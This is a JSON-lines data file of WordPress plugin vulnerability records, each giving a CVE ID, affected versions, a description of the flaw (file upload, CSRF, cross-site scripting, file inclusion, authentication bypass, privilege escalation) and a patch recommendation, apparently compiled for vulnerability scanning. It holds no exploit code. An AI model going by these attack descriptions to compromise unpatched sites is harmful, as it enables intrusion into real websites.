{"CVE_ID":"CVE-2024-4389","slug":"depicter","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadFile function in all versions up to, and including, 3.1.1. This makes it possible for authenticated attackers, with contributor access or higher, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f025da-c28c-4a80-8b4f-27dae07b2b04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f025da-c28c-4a80-8b4f-27dae07b2b04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108589\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108589\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/FileUploaderService.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2111","slug":"wp-headers-and-footers","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Insert Headers And Footers plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.1. This is due to missing or incorrect nonce validation on the 'custom_plugin_set_option' function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. The 'WPBRIGADE_SDK__DEV_MODE' constant must be set to 'true' to exploit the vulnerability.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-headers-and-footers\\\/trunk\\\/lib\\\/wpb-sdk\\\/views\\\/wpb-debug.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276361\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276361\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b00d175-261d-46e3-bf3c-2d18f4e4972d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b00d175-261d-46e3-bf3c-2d18f4e4972d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4799","slug":"wp-embed-facebook","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Magic Embeds WordPress plugin through 3.0.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c71873-5ae7-4f94-8ba9-03e03ff55180\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c71873-5ae7-4f94-8ba9-03e03ff55180\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6571","slug":"imageseo","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Optimize Images ALT Text (alt tag) & names for SEO using AI plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.1.1. This is due the plugin utilizing cocur and not preventing direct access to the generate-default.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a11083dd-7a5f-483b-a854-2697ddc54262?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a11083dd-7a5f-483b-a854-2697ddc54262?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122915%40imageseo&new=3122915%40imageseo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122915%40imageseo&new=3122915%40imageseo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1061","slug":"nextend-social-login-pro","versionImpact":"3.1.16","versionEndExcluding":"3.1.17","description":"The Nextend Social Login Pro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.1.16. This is due to insufficient verification on the user being supplied during the Apple OAuth authenticate request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 3.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/pro-addon-changelog\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/pro-addon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/provider-apple\\\/\",\"name\":\"https:\\\/\\\/nextendweb.com\\\/nextend-social-login-docs\\\/provider-apple\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6494e54c-db04-41f9-8b91-6ad12528cf01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6494e54c-db04-41f9-8b91-6ad12528cf01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11194","slug":"classified-listing","versionImpact":"3.1.15.1","versionEndExcluding":"3.1.16","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a misconfigured check on the 'rtcl_import_settings' function in all versions up to, and including, 3.1.15.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited arbitrary options on the WordPress site. This can be leveraged to update the Subscriber role with Administrator-level capabilities to gain administrative user access to a vulnerable site. The vulnerability is limited in that the option updated must have a value that is an array.","recommendation":"Update to version 3.1.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13d9a59f-1a1a-4936-a5ab-8a5e0c50303b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13d9a59f-1a1a-4936-a5ab-8a5e0c50303b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L473\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L309\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.12\\\/app\\\/Controllers\\\/Ajax\\\/Import.php#L309\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189516\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189516\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8120","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.14","versionEndExcluding":"3.1.15","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class\/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6631","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.14","versionEndExcluding":"3.1.15","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings.","recommendation":"Update to version 3.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119956\\\/imagerecycle-pdf-image-compression\\\/tags\\\/3.1.15\\\/class\\\/class-image-otimizer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7132","slug":"coblocks","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The Page Builder Gutenberg Blocks  WordPress plugin before 3.1.13 does not escape the content of post embed via one of its block, which could allow users with the capability to publish posts (editor and admin by default) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16deb743-6fe9-43a2-9586-d92cfe1daa17\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16deb743-6fe9-43a2-9586-d92cfe1daa17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6447","slug":"full-customer","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the license plan parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping as well as missing authorization and capability checks on the related functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrative user accesses wp-admin dashboard","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3ad1e0-1ae3-44cd-aa2a-dbb3a1b531f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3ad1e0-1ae3-44cd-aa2a-dbb3a1b531f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/api\\\/Connection.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/api\\\/Connection.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/inc\\\/License.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/inc\\\/License.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/actions.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.12\\\/app\\\/controller\\\/actions.php#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6491","slug":"strong-testimonials","versionImpact":"3.1.12","versionEndExcluding":"3.1.13","description":"The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the wpmtst_save_view_sticky function in all versions up to, and including, 3.1.12. This makes it possible for authenticated attackers, with contributor access and above, to modify favorite views.","recommendation":"Update to version 3.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3277d93-4f47-445b-a193-ff990b55d054?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3277d93-4f47-445b-a193-ff990b55d054?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097409\\\/strong-testimonials\\\/tags\\\/3.1.13\\\/admin\\\/views.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097409\\\/strong-testimonials\\\/tags\\\/3.1.13\\\/admin\\\/views.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2398","slug":"icegram","versionEndExcluding":"3.1.12","description":"The Icegram Engage WordPress plugin before 3.1.12 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16d47d20-58aa-4d04-9275-fd91ce926ff3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16d47d20-58aa-4d04-9275-fd91ce926ff3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4260","slug":"coblocks","versionImpact":"3.1.11","versionEndExcluding":"3.1.12","description":"The Page Builder Gutenberg Blocks  WordPress plugin before 3.1.12 does not prevent users from pinging arbitrary hosts via some of its shortcodes, which could allow high privilege users such as contributors to perform SSRF attacks.","recommendation":"Update to version 3.1.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69f33e20-8ff4-491c-8f37-a4eadd4ea8cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69f33e20-8ff4-491c-8f37-a4eadd4ea8cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3280","slug":"wpsite-follow-us-badges","versionImpact":"3.1.10","versionEndExcluding":"3.1.11","description":"The Follow Us Badges plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsite_follow_us_badges shortcode in all versions up to, and including, 3.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef1ccef8-9066-4f5c-b5c5-9fa6e54f0e87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef1ccef8-9066-4f5c-b5c5-9fa6e54f0e87?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078718\\\/wpsite-follow-us-badges\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078718\\\/wpsite-follow-us-badges\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9616","slug":"blockmeister","versionImpact":"3.1.10","versionEndExcluding":"3.1.11","description":"The BlockMeister \u2013 Block Pattern Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/584d4517-1152-42fa-9ea9-a9e9ed8996fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/584d4517-1152-42fa-9ea9-a9e9ed8996fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/Pattern_Builder\\\/Admin\\\/BlockMeister_Pattern_List_Table.php#L272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/Pattern_Builder\\\/Admin\\\/BlockMeister_Pattern_List_Table.php#L272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/JSON_File_Uploader.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.10\\\/includes\\\/JSON_File_Uploader.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3165925%40blockmeister&new=3165925%40blockmeister&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3165925%40blockmeister&new=3165925%40blockmeister&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.11\\\/includes\\\/JSON_File_Uploader.php?rev=3165925#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blockmeister\\\/tags\\\/3.1.11\\\/includes\\\/JSON_File_Uploader.php?rev=3165925#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2933","slug":"coblocks","versionImpact":"3.1.9","versionEndExcluding":"3.1.10","description":"The Page Builder Gutenberg Blocks \u2013 CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Social Profiles widget in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020d14f8-e8e2-4da2-9a4b-4d15cb0994c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020d14f8-e8e2-4da2-9a4b-4d15cb0994c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coblocks\\\/tags\\\/3.1.7\\\/src\\\/blocks\\\/social-profiles\\\/index.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coblocks\\\/tags\\\/3.1.7\\\/src\\\/blocks\\\/social-profiles\\\/index.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095285%40coblocks&new=3095285%40coblocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095285%40coblocks&new=3095285%40coblocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1527","slug":"woolentor-addons","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +20 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to a Stored DOM-Based Cross-Site Scripting via the plugin's Flash Sale Countdown module in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253711\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/flash-sale\\\/assets\\\/js\\\/flash-sale.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253711\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/flash-sale\\\/assets\\\/js\\\/flash-sale.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3405b50-a3f0-4280-8a34-ed86ce3d4db4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3405b50-a3f0-4280-8a34-ed86ce3d4db4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"sticky-buttons","versionEndExcluding":"3.1.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4171","slug":"where-did-they-go-from-here","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The WZ Followed Posts \u2013 Display what visitors are reading plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wfp' shortcode in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3287192%40where-did-they-go-from-here&new=3287192%40where-did-they-go-from-here&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3287192%40where-did-they-go-from-here&new=3287192%40where-did-they-go-from-here&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b27a7b1-6fee-433f-8102-4a3745a8dfed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b27a7b1-6fee-433f-8102-4a3745a8dfed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3499","slug":"elementskit-lite","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.1.0 via the generate_navigation_markup function of the Onepage Scroll module. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6158ec37-a6fb-42f9-bab6-bf547ea28ea0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6158ec37-a6fb-42f9-bab6-bf547ea28ea0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070789\\\/elementskit-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070789\\\/elementskit-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6692","slug":"ultimate-blocks","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tab anchor metabox in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33e7006f-3fb9-4493-9ce5-67698c877159?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33e7006f-3fb9-4493-9ce5-67698c877159?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022998%40ultimate-blocks%2Ftrunk&old=3016254%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022998%40ultimate-blocks%2Ftrunk&old=3016254%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
